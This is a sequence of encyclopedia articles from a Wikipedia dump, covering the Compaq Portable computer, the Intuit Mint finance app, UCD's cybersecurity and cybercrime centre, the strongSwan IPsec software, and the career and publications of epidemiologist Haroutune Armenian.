Vision processing unit, a class of processors aimed at machine vision (including convolutional neural networks, hence overlapping with 'neural processing units')
References
Qualcomm software
Mobile software
Data mining and machine learning software
Image processing software
Speech recognition software
AI accelerators
|
1374269
|
https://en.wikipedia.org/wiki/Compaq%20Portable
|
Compaq Portable
|
The Compaq Portable is an early portable computer which was one of the first IBM PC compatible systems. It was Compaq Computer Corporation's first product, to be followed by others in the Compaq Portable series and later Compaq Deskpro series. It was not simply an 8088-CPU computer that ran a Microsoft DOS as a PC "work-alike", but contained a reverse-engineered BIOS, and a version of MS-DOS that was so similar to IBM's PC DOS that it ran nearly all its application software. The computer was also an early variation on the idea of an "all-in-one".
It became available two years after the similar, but CP/M-based, Osborne 1 and Kaypro II. Columbia Data Products' MPC 1600 "Multi Personal Computer" had come out in June 1982. Other "work-alikes" included the MS-DOS and 8088-based, but not entirely IBM PC software compatible, Dynalogic Hyperion, Eagle Computer's Eagle 1600 series, including the Eagle Spirit portable, and the Corona personal computer The latter two companies were threatened by IBM for BIOS copyright infringement, and settled out of court, agreeing to re-implement their BIOS. There was also the Seequa Chameleon, which had both 8088 and Z80 CPUs to alternately run MS-DOS or CP/M OSes. Unlike Compaq, many of these companies had previously released computers based on Zilog's Z80 and Digital Research's CP/M operating system. Like Compaq, they recognized the replicability of the IBM PC's off-the-shelf parts, and saw that Microsoft retained the right to license MS-DOS to other companies. Only Compaq was able to fully capitalize on this, by aiming for complete IBM PC and PC-DOS software compatibility, while reverse-engineering the BIOS to head off copyright legal claims.
Other contemporary systems include the portable Commodore SX-64, also known as the Executive 64, or VIP-64 in Europe, is a briefcase/suitcase-size "luggable" version of the popular Commodore 64 home computer built with an 8-bit MOS 6510 (6502-based) CPU microprocessor, and the first full-color portable computer. Like the Z80 and "work-alike" portables, its sales fell into insignificance in the face of the Compaq Portable series.
Production and sales
The Compaq Portable was announced in November 1982 and first shipped in March 1983, priced at US$2,995 () with a single half-height " 360 kB diskette drive or US$3,590 for dual, full-height diskette drives. The Compaq Portable folded up into a luggable case the size of a portable sewing machine.
IBM responded to the Compaq Portable with the IBM Portable, developed because its sales force needed a comparable computer to sell against Compaq.
Compaq sold 53,000 units in the first year with a total of US$111 million in revenue, an American Business record. In the second year revenue hit US$329 million setting an industry record. Third year revenue was at US$503.9 million, another US business record.
Design
The Compaq Portable has basically the same hardware as an IBM PC, transplanted into a luggable case (specifically designed to fit as carry-on luggage on an airplane), with Compaq's BIOS instead of IBM's. All Portables shipped with 128 KB of RAM and 1-2 double-sided double-density 360 KB disk drives. Like the non-portable IBM PC, the Compaq Portable runs on power from an AC outlet only; it has no battery.
The machine uses a unique hybrid of the IBM MDA and CGA which supports the latter's graphics modes, but contains both cards' text fonts in ROM. When using the internal monochrome monitor the 9×14 font is used, and the 8×8 one when an external monitor is used (the user switches between internal and external monitors by pressing ). The user can use both IBM video standards, for graphics capabilities and high-resolution text. With a larger external monitor, the graphics hardware is also used in the original Compaq Deskpro desktop computer.
Compaq used a "foam and foil" keyboard from Keytronics, with contact mylar pads that were also featured in the Tandy TRS-80, Apple Lisa 1 and 2, Compaq Deskpro 286 AT, some mainframe terminals, SUN Type 4, and some Wang keyboards. The foam pads the keyboards used to make contact with the circuit board when pressed disintegrate over time, due to both the wear of normal use and natural wear. The CRT display also suffered from a low refresh rate and heavy ghosting.
Software
Compaq's efforts were possible because IBM had used mostly off-the-shelf parts for the PC and published full technical documentation for it, and because Microsoft had kept the right to license MS-DOS to other computer manufacturers. The only difficulty was the BIOS, because it contained IBM's copyrighted code. Compaq solved this problem by producing a clean room workalike that performed all documented functions of the IBM PC BIOS, but was completely written from scratch.
Although numerous other companies soon also began selling PC compatibles, few matched Compaq's achievement of essentially-complete software compatibility with the IBM PC (typically reaching "95% compatibility" at best) until Phoenix Technologies and others began selling similarly reverse-engineered BIOSs on the open market.
The first Portables used Compaq DOS 1.10, essentially identical to PC DOS 1.10 except for having a standalone BASIC that did not require the IBM PC's ROM Cassette BASIC, but this was superseded in a few months by DOS 2.00 which added hard disk support and other advanced features.
Aside from using DOS 1.x, the initial Portables are similar to the 16 KB – 64 KB models of the IBM PC in that the BIOS was limited to 544 KB of RAM and did not support expansion ROMs, thus making them unable to use EGA/VGA cards, hard disks, or similar hardware. After DOS 2.x and the IBM XT came out, Compaq upgraded the BIOS. Although the Portable was not offered with a factory hard disk, users commonly installed them. Starting in 1984, Compaq began offering a hard disk-equipped version, the Portable Plus, which also featured a single half-height floppy drive. The hard disk offered would be 10 to 21 megabytes, although bad sectors often reduced the space available for use.
In 1985, Compaq introduced the Portable 286, but it was replaced by the more compact Portable II in a redesigned case within a few months. The Portable 286 featured a full height hard disk, and the options of one half-height floppy drive, two half-height floppy drives, or a half-height floppy drive and a tape backup drive.
Reception
BYTE wrote, after testing a prototype, that the Compaq Portable "looks like a sure winner" because of its portability, cost, and high degree of compatibility with the IBM PC. Its reviewer tested IBM PC DOS, CP/M-86, WordStar, Supercalc, and several other software packages, and found that all worked except one game. PC Magazine also rated the Compaq Portable very highly for compatibility, reporting that all tested applications ran. It praised the "rugged" hardware design and sharp display, and concluded that it was "certainly worth consideration by anyone seeking to run IBM PC software without an IBM PC".
Successors
Upgrades of Compaq Portable
Compaq Portable Plus
Released in 1983 upgraded version; The Compaq Portable Plus simply had a hard drive to replace one floppy disk drive, and logos and badges with gold backgrounds instead of silver. Independent computer stores were previously doing this upon request of users, and Compaq saw this as a lost revenue opportunity.
Compaq Portable 286
The Compaq Portable 286, Compaq's version of the PC AT, was offered in the original Compaq Portable chassis; it was equipped with a 6/8 MHz 286 and a high-speed 20 MB hard drive.
Compaq Portable series
The Compaq Portable machine was the first of a series of Compaq Portable machines. The Compaq Portable II was smaller and lighter version of Compaq Portable 286; it was less expensive but with limited upgradability and a slower hard drive, The Compaq Portable III, Compaq Portable 386, Compaq Portable 486 and Compaq Portable 486c were later in the series.
References
External links
Old Computers - Compaq Portable
CED in the History of Media Technology - Compaq Portable
Obsolete Computer Museum - Compaq Portable description
Computer-related introductions in 1983
|
13783191
|
https://en.wikipedia.org/wiki/Intuit%20Mint
|
Intuit Mint
|
Mint, also known as Intuit Mint (styled in its logo as intuit mint with dotted 't' characters in "intuit" and undotted 'i' characters) and formerly known as Mint.com, is a personal financial management website and mobile app for the US and Canada produced by Intuit, Inc. (which also produces TurboTax, QuickBooks, and Credit Karma).
Mint.com was originally created by Aaron Patzer and provided account aggregation through a deal with Yodlee, but switched to using Intuit's own system for connecting to accounts after it was purchased by Intuit in 2009. It was later renamed from "Mint.com" to just "Mint". Mint's primary service allows users to track bank, credit card, investment, and loan balances and transactions through a single user interface, as well as create budgets and set financial goals.
As of 2010, Mint.com claimed to connect with more than 16,000 US and Canadian financial institutions, and to support more than 17 million individual financial accounts. , Mint.com claimed to have more than 10 million users. In 2016, Mint.com claimed to have over 20 million users.
Mint Bills, previously known as Check and Pageonce was a financial account management and bill payment service bought by Intuit in 2014 and integrated into Mint.com in March 2017. The Mint.com bill payment service was then discontinued on June 30, 2018.
Investment and finances
Mint raised over $31M in venture capital funding from DAG Ventures, Shasta Ventures, and First Round Capital, as well as from angel investors including Ram Shriram, an early investor in Google. The latest round of $14M was closed on August 4, 2009, and reported by CEO Aaron Patzer as preemptive. TechCrunch later pegged the valuation of Mint at $140M.
In February 2008, revenue was generated through lead generation, earned via earning referral fees from recommendations of highly personalized, targeted financial products to its users.
Sale
On September 13, 2009, TechCrunch reported Intuit would acquire Mint for $170 million. An official announcement was made the following day.
On November 2, 2009, Intuit announced their acquisition of Mint.com was complete. The former CEO of Mint.com, Aaron Patzer, was named vice president and general manager of Intuit’s personal finance group, responsible for Mint.com and all Quicken online, desktop, and mobile offerings. Patzer further added the features of the online product Mint.com would be incorporated into the Intuit's Quicken desktop product, and vice versa, as two collaborative aspects of the Intuit Personal Finance team. Patzer left Intuit in December 2012.
Controversial practices
Security
Mint asks users to provide both the user names and the passwords to their bank accounts, credit cards, and other financial accounts, which Mint then stores in their databases in a decryptable format. This has raised concerns that if the Mint databases were ever hacked, both user names and passwords would become available to rogue third parties. Some banks support a separate "access code" for read-only access to financial information, which reduces the risk to some degree.
In January 2017, Intuit and JPMorgan Chase settled a longstanding dispute, and agreed to develop software where Chase customers send their data, for financial purposes, to Mint without having Intuit store customers' names and passwords. It was also agreed Intuit would never sell Chase’s customer data.
See also
Personal financial management
Wikinvest
References
Further reading
External links
2006 establishments in California
American companies established in 2006
Financial services companies established in 2006
Account aggregation providers
Accounting software
Intuit software
Companies based in Mountain View, California
Software companies established in 2006
Finance websites
IOS software
Android (operating system) software
WatchOS software
2009 mergers and acquisitions
|
47871352
|
https://en.wikipedia.org/wiki/Centre%20for%20Cybersecurity%20%26%20Cybercrime%20Investigation
|
Centre for Cybersecurity & Cybercrime Investigation
|
The University College Dublin Centre for Cybersecurity & Cybercrime Investigation (UCD CCI) is a centre for research and education in cybersecurity, cybercrime and digital forensic science in Dublin, Ireland.
The UCD Centre for Cybersecurity & Cybercrime Investigation was established in the early 2000s, and has developed collaborative relationships with law enforcement and industry from across the world. The Centre for Cybersecurity & Cybercrime Investigation is widely regarded as Europe's leading centre for research and education in cybersecurity, cybercrime and digital forensics. UCD CCI trains specialist officers from the Irish national police service, the Garda Síochána, Irish military personnel from the Defence Forces, as well as international law enforcement agencies Interpol and Europol, and authorities from over 40 countries. The CCI also runs educational qualifications and training for the industry sector and multinational corporations. The centre's director is Professor Joe Carthy BSc., PhD.
There is a Memorandum of Understanding between the Centre for Cybersecurity & Cybercrime Investigation at UCD and the National Cyber Security Centre (NCSC) at the DCCAE, the Irish government's computer emergency response team. Additionally, UCD CCI has formal relationships with the Garda Síochána, Irish Defence Forces, INTERPOL, Europol, Visa Inc., the Irish Banking Federation, as well as collaborations with the United Nations Office on Drugs and Crime (UNODC), the Organization for Security and Co-operation in Europe (OSCE), European Anti-Fraud Office (OLAF), Microsoft, Citibank and eBay.
See also
National Cyber Security Centre (NCSC)
Garda Bureau of Fraud Investigation (GBFI)
Communications and Information Services Corps (CIS)
References
External links
University College Dublin (UCD) Centre for Cybersecurity & Cybercrime Investigation (CCI)
Computer security organizations
Cyberwarfare
Cryptography organizations
Information technology management
Software engineering organizations
Communications in the Republic of Ireland
Telecommunications in the Republic of Ireland
Fraud in the Republic of Ireland
Cybercrime
Cybercrime in the Republic of Ireland
|
2479857
|
https://en.wikipedia.org/wiki/StrongSwan
|
StrongSwan
|
strongSwan is a multiplatform IPsec implementation. The focus of the project is on strong authentication mechanisms using X.509 public key certificates and optional secure storage of private keys and certificates on smartcards through a standardized PKCS#11 interface and on TPM 2.0.
Overview
The project is maintained by Andreas Steffen who is a professor for Security in Communications at the University of Applied Sciences in Rapperswil, Switzerland.
As a descendant of the FreeS/WAN project, strongSwan continues to be released under the GPL license. It supports certificate revocation lists and the Online Certificate Status Protocol (OCSP). A unique feature is the use of X.509 attribute certificates to implement access control schemes based on group memberships. StrongSwan interoperates with other IPsec implementations, including various Microsoft Windows and macOS VPN clients. The current version of strongSwan fully implements the Internet Key Exchange (IKEv2) protocol defined by RFC 7296.
Features
strongSwan supports IKEv1 and fully implements IKEv2.
IKEv1 and IKEv2 features
strongSwan offers plugins, enhancing its functionality. The user can choose among three crypto libraries (legacy [non-US] FreeS/WAN, OpenSSL, and gcrypt).
Using the openssl plugin, strongSwan supports Elliptic Curve Cryptography (ECDH groups and ECDSA certificates and signatures) both for IKEv2 and IKEv1, so that interoperability with Microsoft's Suite B implementation on Vista, Win 7, Server 2008, etc. is possible.
Automatic assignment of virtual IP addresses to VPN clients from one or several address pools using either the IKEv1 ModeConfig or IKEv2 Configuration payload. The pools are either volatile (i.e. RAM-based) or stored in a SQLite or MySQL database (with configurable lease-times).
The ipsec pool command line utility allows the management of IP address pools and configuration attributes like internal DNS and NBNS servers.
IKEv2 only features
The IKEv2 daemon is inherently multi-threaded (16 threads by default).
The IKEv2 daemon comes with a High-Availability option based on Cluster IP where currently a cluster of two hosts does active load-sharing and each host can take over the ESP and IKEv2 states without rekeying if the other host fails.
The following EAP authentication methods are supported: AKA and SIM including the management of multiple [U]SIM cards, MD5, MSCHAPv2, GTC, TLS, TTLS. EAP-MSCHAPv2 authentication based on user passwords and EAP-TLS with user certificates are interoperable with the Windows 7 Agile VPN Client.
The EAP-RADIUS plugin relays EAP packets to one or multiple AAA servers (e.g. FreeRADIUS or Active Directory).
Support of RFC 5998 EAP-Only Authentication in conjunction with strong mutual authentication methods like e.g. EAP-TLS.
Support of RFC 4739 IKEv2 Multiple Authentication Exchanges.
Support of RFC 5685 IKEv2 Redirection.
Support of the RFC 4555 Mobility and Multihoming Protocol (MOBIKE) which allows dynamic changes of the IP address and/or network interface without IKEv2 rekeying. MOBIKE is also supported by the Windows 7 Agile VPN Client.
The strongSwan IKEv2 NetworkManager applet supports EAP, X.509 certificate and PKCS#11 smartcard based authentication. Assigned DNS servers are automatically installed and removed again in /etc/resolv.conf.
Support of Trusted Network Connect (TNC). A strongSwan VPN client can act as a TNC client and a strongSwan VPN gateway as a Policy Enforcement Point (PEP) and optionally as a co-located TNC server. The following TCG interfaces are supported: IF-IMC 1.2, IF-IMV 1.2, IF-PEP 1.1, IF-TNCCS 1.1, IF-TNCCS 2.0 (RFC 5793 PB-TNC), IF-M 1.0 (RFC 5792 PA-TNC), and IF-MAP 2.0.
The IKEv2 daemon has been fully ported to the Android operating system including integration into the Android VPN applet. It has also been ported to the Maemo, FreeBSD and macOS operating systems.
KVM simulation environment
The focus of the strongSwan project lies on strong authentication by means of X.509 certificates, as well as the optional safe storage of private keys on smart cards using the standardized PKCS#11 interface, strongSwan certificate check lists and On-line Certificate Status Protocol (OCSP).
An important capability is the use of X.509 Certificate Attributes, which permits it to utilize complex access control mechanisms on the basis of group memberships.
strongSwan comes with a simulation environment based on KVM. A network of eight virtual hosts allows the user to enact a multitude of site-to-site and roadwarrior VPN scenarios.
See also
Libreswan
Openswan
References
External links
Free security software
Cryptographic software
Key management
IPsec
Virtual private networks
|
49714462
|
https://en.wikipedia.org/wiki/Haroutune%20Armenian
|
Haroutune Armenian
|
Haroutune Armenian (, 18 June 1942), is a Lebanese born Armenian-American academic, physician, doctor of public health (1974), Professor, President of the American University of Armenia (1997- 2009), President Emeritus, American University of Armenia. Professor in Residence, UCLA, Fielding School of Public Health.
Biography
Doctor Armenian is a Professor in Residence at the University of California in Los Angeles, President Emeritus of the American University of Armenia, and Professor Emeritus at Johns Hopkins University.
Education
American University of Beirut, 1961–1964, B.S. School of Arts and Sciences
American University of Beirut, 1964–1968, M.D. School of Medicine
Johns Hopkins University, 1971–1974, M.P.H. (1972)
Johns Hopkins School Hygiene & Public Health, Dr.P.H. (1974)
Post-graduate training
American University Medical Center, 1967–1968, Rotating Intern
Beirut, Lebanon, 1968–1971, Resident in Internal Medicine
Johns Hopkins University, 1971–1974, Commonwealth School of Hygiene & Public Health Fund Exchange, Department of Epidemiology Program
Certification
E.C.F.M.G. Certificate 1967
Republic of Lebanon 1968 License to Practice Medicine
American University of Beirut 1971 Certificate of Specialty Training:Department of Internal Medicine
Ministry of Health, Lebanon 1984 Internal Medicine
Registered Medical Specialties and Public Health
Professional experience
Advisory Committee for Research, WHO/EMR0 2015 -Associate Dean Academic Programs Fielding School of Public Health, University of California Los Angeles 2011-2014
Visiting Professor, Supervisor Research Chair Epidemiology, Public Health and Environment 2009 - 2013, King Saud University, Riyadh
Professor in Residence, Department of Epidemiology 2008 – Present, University of California, Los Angeles
President, American University of Armenia 1997-2010
Director of the Master of Public Health Program 1989 – 1996, Johns Hopkins University, School of Hygiene and Public Health, Department of Epidemiology
Professor Emeritus 2008 – Present
Professor of Epidemiology 1988 – 2007
Acting Chairman Jan-June 1991 Nov 1993-July 1994
Deputy Chairman 1988 – 1993
Visiting Professor of Epidemiology 1986 – 1987
Professor of Epidemiology 1984 – 1988
American University of Beirut Coordinator, Interfaculty Research Project for the Study 1984-1986 of the Status of Children in Lebanon
Dean, Faculty of Health Sciences, 1983 – 1988 American University of Beirut
Coordinator, A Health Surveillance and Monitoring 1983 – 1984
Program. Ministry of Health, Lebanon
Acting Dean, Faculty of Health Sciences, A.U.B. 1981 – 1983
Coordinator, In-Service Program Development, Ministry of Public Health, State of Qatar 1981 – 1983
Senior Associate, Department of Epidemiology Johns Hopkins University 1980 – 1986
Associate Professor of Epidemiology Faculty of Health Sciences, A.U.B. 1979 – 1984
Planning Coordinator, Family Practice Residency Programs; Ministry of Health, State of Bahrain and American University of Beirut 1978 – 1979
Coordinator, Office of Professional Standards and Systems Analysis; Ministry of Health State of Bahrain 1976 – 1981
Manager, Health Services Research and Development A.U.B. Services Corporation 1976–1979
Commissioning Officer, Health Centers, Ministry of Health, State of Bahrain 1976–1978
Assistant Professor of Epidemiology, School of Public Health, American University of Beirut 1974 – 1979
Societies and honors
Order of St. Sahak – St. Mesrop Catholicos of All Armenians, Armenia, 2007
Advising, Teaching and Mentoring Award Johns Hopkins Bloomberg School Student Assembly 2005 & 1999
Presidential Medal of the Order of Cedars, Lebanon 2004
Golden Apple Award for Excellence in Teaching Johns Hopkins Bloomberg School of Public Health 2002
Movses Khorenatsi Presidential Medal of Service and Accomplishment, Armenia, 2001
Fellow, Royal College of Physicians, London, 2001
Honorary Diploma of Appreciation, Ministry of Health, Lebanon 1997
Secretary, International Epidemiological Association Executive Council 1996–2002
Ernest Lyman Stebbins Medal, Excellence in Education School of Hygiene and Public Health, Johns Hopkins University 1995
Honorary President, Armenian Public Health Association 1995
Member, Scientific Advisory Board, National Institutes of Health of Armenia 1993
Search Committee, Director, Centers for Disease Control and Prevention, U.S.A. 1993
Certificate of Recognition of Excellence 1992
Armenian Behavioral Science Association
American Epidemiological Society 1989
Society for Epidemiologic Research 1989
Secretary, International Board of Advisors 1988
Armenian Genealogical Society
Society of Scholars, Johns Hopkins University 1986
Who's Who in Science 1985
Who's Who in Lebanon 1985
Delta Omega, National Honorary Public Health Society 1985
Central Executive Committee, Hamazkaine 1981
Cultural associations
Member, International Epidemiological Association 1981-
Member, American College of Preventive Medicine 1981
Executive Board Member, Association of Lebanese 1980 -1982
Armenian Physicians
Fellow, American College of Epidemiology 1980
Member, American Public Health Association 1980 -
Alpha Omega Alpha, Honor Medical Society 1979
Board Member, Karageuzian Foundation, Beirut 1978 -1987
Lebanese Public Health Association 1975
Lebanese Order of Physicians 1968
Painting
Haroutune Armenian started painting in Beirut in 1976 during the civil war in Lebanon. His works have been exhibited in Beirut, Los Angeles and Yerevan.
Publications
Books
Editor with H. Zurayk and Author of a Chapter: Beirut 1984. A Population & Health Profile. American University Press, 1985.
Editor with J. Bryce and author of three chapters; In Wartime: The State of Children in Lebanon. American University of Beirut, 1986.
Armenian HK, Gordis L, Gregg MB and Levine MM (eds): Epidemiologic Reviews, Volume 11, Johns Hopkins University, 1989.
Armenian HK, Gordis L, Levine MM, Thacker SB (eds): Epidemiologic Reviews, Volume 12, Johns Hopkins University, Baltimore, 1990.
Armenian HK, Gordis L, Levine MM, Thacker SB (eds): Epidemiologic Reviews, Volume 13, Johns Hopkins University, Baltimore, 1991.
Armenian HK, Gordis L, Levine MM, Thacker SB (eds): Epidemiologic Reviews, Volume 14, Johns Hopkins University, Baltimore, 1992.
Armenian HK, Gordis L, Levine MM, Thacker SB (eds): Epidemiologic Reviews, Volume 15, Johns Hopkins University, Baltimore, 1993.
Armenian HK, (ed). Epidemiologic Reviews, Applications of the Case-Control Method, Volume 16(1), Johns Hopkins University, Baltimore, 1994.
Armenian HK, Gordis L, Kelsey J, Levine MM, Thacker SB (eds): Epidemiologic Reviews, Volume 16(2), Johns Hopkins University. Baltimore, 1994.
Armenian HK, Kelsey J, Levine MM, Samet J, Thacker SB (eds): Epidemiologic Reviews, Volume 17(2). Johns Hopkins University, Baltimore, 1995.
Armenian HK, Kelsey J, Levine MM, Samet J, Thacker SB (eds): Epidemiologic Reviews, Volume 18(2), Johns Hopkins University, Baltimore, 1996.
Armenian HK, Kelsey J, Levine MM, Samet J. Thacker SB (eds). Epidemiologic Reviews, Volume 19(2), Johns Hopkins University, Baltimore 1997.
Armenian HK, Shapiro S (eds). Epidemiology and Health Services. Oxford University Press, New York, 1998.
Armenian HK, Kelsey J, Monto AS, Samet J, Thacker SB (eds). Epidemiologic Reviews, Volume 20 (2), Johns Hopkins University, Baltimore, 1998.
Armenian HK, Kelsey J, Monto AS, Samet J, Thacker SB (eds). Epidemiologic Reviews, Volume 21(2), Johns Hopkins University, Baltimore, 1999.
Armenian HK, Samet JM (eds). Epidemiologic Reviews, Volume 22(1), Epidemiology in the Year 2000 and Beyond, Johns Hopkins University. Baltimore, 2000.
Armenian HK, Kelsey J, Monto AS, Samet J, Thacker SB (eds). Epidemiologic Reviews, Volume 22(2), Oxford University Press for the Johns Hopkins University School of Hygiene and Public Health, Baltimore, 2000.
Hsing AW, Nomura AM, Isaacs WB, Armenian HK (eds). Epidemiologic Reviews, Volume 23(1), Prostate Cancer, Oxford University Press for the Johns Hopkins University School of Hygiene and Public Health, Baltimore, 2001.
Armenian HK, Kelsey J, Monto AS, Samet J, Thacker SB (eds). Epidemiologic Reviews, Volume 23(2), Oxford University Press for the Johns Hopkins University School of Hygiene and Public Health, Baltimore, 2002.
Armenian, HK. Colors and Words from Armenia and Beyond (watercolors and prose-poetry) 2002 in Armenian and 2004 in English, Print info, Yerevan.
Armenian, HK. Past Does not Melt Here (watercolors & prose poetry) 2007 in Armenian.
Armenian, HK. Case Control Studies: Design and Applications, Oxford University Press, New York, 2009.
Armenian, HK. Life With Watercolors. Noah's Ark, Beirut, 2014.
Publications-Journals
Armenian HK: Bone and Marrow Needle Biopsy. Leb Med J. 24:245 51;1971.
Baghdassarian SA, Armenian HK, Khachadurian AK: Absence of Ophthalmoscopic Changes in Familial Paroxysmal Polyserositis. Archives Ophthalmology, 88:607 08;1972.
Khachadurian AK, Armenian HK: Familial Paroxysmal Polyserositis (FPP): A Report of 120 Cases from Lebanon. Pediatric Research, 6:362-702;1972.
Khachadurian AK, Armenian HK: The Management of Familial Paroxysmal Polyserositis (Familial Mediterranean Fever). Experience with Low Fat Diets and Clofibrate. Lebanese Medical Journal, 25:495 502;1972.
Armenian HK, Khachadurian AK: Familial Paroxysmal Polyserositis, Clinical and Laboratory Findings in 120 Cases. Lebanese Medical Journal, 26:605 14; 1973.
Armenian HK, Lilienfeld AM: The Distribution of Incubation Periods of Neoplastic Diseases. American Journal of Epidemiology, 99:92 100;1974.
Khachadurian AK, Armenian HK: Familial Paroxysmal Polyserositis. Mode of Inheritance and Incidence of Amyloidosis. Proceedings of the Fifth Conference on the Clinical Delineation of Birth Defects, Baltimore, Maryland. Birth Defects: Original Article Series, 10:62 6;1974.
Armenian HK, Lilienfeld AM, Diamond EL, Bross IDJ: Relation Between Benign Prostatic Hyperplasia to Cancer of the Prostate. A Prospective and Retrospective Study. Lancet, 2:115 17;1974.
Armenian HK, Lilienfeld AM, Diamond EL, Bross IDJ: Epidemiologic Characteristics of Patients with Prostatic Neoplasms, American Journal of Epidemiology, 102:47 54;1975.
Armenian HK, Uthman SM: Familial Paroxysmal Polyserositis. Lebanese Medical Journal. 28:439 42;1975.
Armenian H K: Medicine and the Nomads. Modern Medicine Middle East, 1:8 11;1975.
Kabakian HA, Armenian HK, Deeb ZL, Rizk GK: Asymmetry of the Pelvic Ureters in Normal Females. American Journal of Roentgenology, 127(5):723 7;1976.
Armenian HK: Developing A Quality Assurance Program in the State of Bahrain. Quality Review Bulletin, J.C.A.H. 4:9 11;1978.
Sawaya J, Atweh G, Armenian HK: Coronary Care Experience in a University Hospital. Middle East Journal of Anesthesiology 5:249 67;1979.
Sawaya JI, Mujais SK, Armenian HK: Early Diagnosis of Pericarditis in Acute Myocardial Infarction. American Heart Journal, 100:144 51;1980.
Armenian HK: Evaluation and Projections for the Primary Health Care System in Bahrain. Bahrain Medical Bulletin, 2:71 5;1980.
Hamadeh RR, Armenian HK, Zurayk HC: Clustering of Cases of Leukemia, Hodgkin's Disease and Other Lymphomas in Bahrain. Tropical and Geographical Medicine, 33:42 9;1981.
Armenian HK, Dajani AW, Fakhro AM: Impact of Peer Review and Itemized Medical Record Forms on Medical Care in a Health Center in Bahrain. Quality Review Bulletin, 7:6 11;1981.
Armenian HK, Khuri M: Age at Onset of Genetic Diseases. An Application for Sartwell's Model of the Distribution of Incubation Periods. M.E.J. Anesthesiologyl, 113:596 605;1981.
Armenian HK, Chamieh MA, Baraka A: Influence of Wartime Stress and Psychosocial Factors in Lebanon on Analgesic Requirements for Post Operative Pain. Social Science and Medicine, 15E:63 6;1981.
Kimball A, Hamadeh RR, Mahmood RAH, Khalfan S, Muhsin A, Ghabrial F, Armenian HK: Gynecomastia Among Children in Bahrain. Lancet, February 28, 1981.
Armenian HK: Genetic and Environmental Factors in the Etiology of Familial Paroxysmal Polyserositis. Tropical and Geographical Medicine. 34:183 87;1982.
Khachadurian AK, Uthman S, Armenian HK: Association of Tendon Xanthomas and Corneal Arcus with Coronary Heart Disease in Heterozygous Familial Hypercholesterolemia. World Congress of Cardiology, June, 1982.
Armenian HK: Enrollment Bias and Variation in Clinical Manifestations: A Review of Consecutive Cases of Familial Paroxysmal Polyserositis. Journal of Chronic Disease, 36:209 12;1983.
Armenian HK, Lilienfeld AM: Incubation Period of Disease, Epidemiology Reviews, 5:1 15;1983.
Yazigi A, Zahr L, Armenian HK: Patient Compliance in a Well Baby Clinic. Effect of Two Modes of Intervention. Tropical and Geographical Medicine, 38(2):104 09;1986
Armenian HK: In Wartime: Options for Epidemiology. American Journal of Epidemiology, 124:28 32;1986.
Armenian HK, Sha'ar KH: Epidemiologic Observations in Familial Paroxysmal Polyserositis. Epidemiology Reviews, 8:106 16;1986.
Armenian HK, Zurayk HC, Kazandjian VA: The Epidemiology of Infant Deaths in the Armenian Parish Records of Lebanon. International Journal of Epidemiology, 15:372 77;1986.
Lockwood Hourani L, Armenian H, Zurayk H, Afifi L: A Population Based Survey of Loss and Psychological Distress During War. Social Science and Medicien. 23:269 75;1986.
Armenian HK, Issa JP, Sahakian V, Tawa C, Ariss L, Dona F, Saliba K: Snoring and hypertension in a study sample from Lebanon. Lebanese Medical Journal, 36:25 7;1986.
Obermeyer CM, Armenian HK, Azoury R: Endometriosis in Lebanon. A Case Control Study. American Journal of Epidemiology, 124:762 7;1986.
Armenian HK, Saadeh FM, Armenian SL: Widowhood and Mortality in an Armenian Church Parish in Lebanon. American Journal of Epidemiology, 125:127 32;1987.
Darwish MJ, Armenian HK: A Case Control Study of Rheumatoid Arthritis in Lebanon. International Journal of Epidemiology, 16:420 24;1987.
Armenian HK: Incubation Periods of Cancer: Old and New. Journal of Chronic Diseases, 40:95 155;1987.
Armenian HK, Lakkis NG, Sibai AM, Halabi SS: Hospital Visitors as Controls. American Journal of Epidemiology, 127:404 06;1988.
Armenian HK, Acra A. From the missionaries to the endemic war: Public health action and research at the American University of Beirut. Journal of Public Health Policy, 9:261 72;1988.
Armenian HK, Chamieh MA, Darwish MJ: The use of the lognormal distribution to study the time of occurrence of drug induced diseases. Journal of Clinical Research & Drug Development, 2:101 13;1988.
Armenian HK, Hamadeh RR, Chamieh MA, Rumaihi N: Seasonal variation of hospital deaths in some Middle Eastern countries. Lebanese Science Bulletin, 4(2):55 64;1988.
Armenian HK. Perceptions from epidemiologic research in an endemic war. Social Science and Medicine, 28:643 47;1989.
Armenian HK, Halabi SS, Khlat M. Epidemiology of primary health problems in Beirut. Journal of Epidemiology and Community Health, 43:315-318;1989.
Armenian HK, McCarthy JF, Balabanian SG. Patterns of mortality in Armenian parish records from eleven countries. American Journal of Epidemiology, 130(6):1227-1235;1989.
Noji EK, Kelen GD, Armenian HK et al. The 1988 earthquake in Soviet Armenia: A case study. Annals of Emergency Medicine 19:891-97;1990.
Sibai AM, Armenian HK, Alam S. Wartime determinants of arteriographically confirmed coronary artery disease in Beirut. Middle East Journal of Anesthesiology. 1991 Feb; 11(1): 25–38.
Pereira Fonseca MG, Armenian HK. Use of the Case-Control Method in Outbreak Investigations. American Journal of Epidemiology, 133(7):748-752;April 1991.
Armenian HK. Case investigation in epidemiology. American Journal of Epidemiology, 134 (10):1067-1072;1991.
Armenian HK, Noji EK, Oganesian AP. A case-control study of injuries due to the earthquake in Armenia. Bulletin of the World Health Organization, 70(2):251-257;1992.
Palenicek J, Fox R, Margolick J, Farzadegan H, Hoover D, Odaka N, Rubb S, Armenian H, Harris J, Saah A. Longitudinal Study of Homosexual Couples Discordant for HIV-1 Antibodies in the Baltimore MACS. Journal of Acquired Immune Deficiency Syndrome, 5:1204-1211;1992.
Armenian HK, McCarthy JF, Balbanian SG. Patterns of Infant Mortality from Armenian Parish Records: A Study from Ten Countries of the Diaspora between 1737 and 1982. International Journal of Epidemiology, 22(3):457-462;1993.
Batieha AM, Armenian HK, Norkus EP, Morris JS, Spate VE, Comstock GW. Serum Micronutrients and the Subsequent Risk of Cervical Cancer in a Population Based Nested Case-Control Study. Cancer Epidemiology Biomarkers and Prevention 2:335-339; July/August 1993.
Armenian HK, Hoover DR, Rubb S, Metz S, Kaslow R, Visscher B, Chmiel J, Kingsley L, Saah A. A Composite Risk Score for Kaposi's Sarcoma Based on a Case-Control and Longitudinal Study in the MACS Population. American Journal of Epidemiology, 138(4):256-265;1993
Hoover DR, Black C, Jacobson LP, Martinez-Maza, O, Seminara D, Saah A, Von Roenn J, Anderson R, Armenian HK. An Epidemiological Analysis of Kaposi's Sarcoma as an Early and Late AIDS Outcome in Gay Men. American Journal of Epidemiology, 138(4):266-278;1993.
Noji EK, Armenian HK, Oganessian A. Issues of rescue and medical care following the 1988 Armenian earthquake. International Journal of Epidemiology. 1993 Dec; 22(6): 1070–6.
